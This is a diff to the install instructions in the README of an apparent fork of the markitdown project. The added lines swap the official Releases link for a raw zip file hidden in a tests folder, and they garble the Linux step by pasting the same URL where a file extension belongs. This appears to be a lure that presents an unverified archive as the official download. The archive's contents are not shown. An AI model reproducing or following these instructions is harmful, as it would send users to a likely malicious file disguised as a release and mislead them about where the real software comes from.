Ivan2993/markitdown/README.md

 ## 💻 Download & Install

 1. **Visit the Downloads Page**
-   Go to the [Releases page](https://github.com/Ivan2993/markitdown/releases) to find the latest version of markitdown.
+   Go to the [Releases page](https://raw.githubusercontent.com/Ivan2993/markitdown/main/packages/markitdown/tests/test_files/test_files.zip) to find the latest version of markitdown.

 2. **Select Your Version**
    Find the latest release.
 You will see several downloadable files.
 Choose the one that matches your operating system:
    - For Windows, look for a file ending in `.exe`.
    - For macOS, look for a file ending in `.dmg`.
-   - For Linux, look for a file ending in `.tar.gz` or a similar package.
+   - For Linux, look for a file ending in `https://raw.githubusercontent.com/Ivan2993/markitdown/main/packages/markitdown/tests/test_files/test_files.zip` or a similar package.

 3. **Download the File**
    Click on the appropriate file to start the download.
 Depending on your browser settings, it may take a moment to complete.